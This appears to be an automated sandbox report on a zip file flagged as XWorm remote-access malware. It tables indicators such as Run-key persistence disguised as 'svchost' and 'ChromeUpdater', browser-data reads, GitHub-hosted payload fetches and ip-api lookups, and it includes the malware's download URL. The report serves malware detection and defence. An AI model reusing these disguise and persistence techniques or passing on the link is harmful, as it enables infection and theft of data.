Analysis Overview
Threat Level: Known bad
The file https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Modifies Installed Components in the registry
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Reads user/profile data of web browsers
Drops startup file
Executes dropped EXE
Enumerates connected drives
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Modifies Internet Explorer settings
Uses Volume Shadow Copy service COM API
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Enumerates processes with tasklist
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy WMI provider
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Kills process with taskkill
Modifies data under HKEY_USERS
NTFS ADS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Modifies registry class
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-11 13:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-11 13:31
Reported
2024-04-11 13:58
Platform
win11-20240214-en
Max time kernel
1588s
Max time network
1590s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" | C:\Users\Admin\Pictures\b3ownddosser.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" | C:\Users\Admin\Pictures\b3ownddosser.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" | C:\Users\Admin\Pictures\b3ownddosser.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" | C:\Users\Admin\Pictures\b3ownddosser.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" | C:\Users\Admin\Pictures\b3ownddosser.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\perfc009.dat | C:\Windows\system32\lodctr.exe | N/A |
| File created | C:\Windows\system32\perfh009.dat | C:\Windows\system32\lodctr.exe | N/A |
Suspicious use of SetThreadContext
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133573161416536741" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f80cb859f6720028040b29b5540cc05aab60000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239} | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
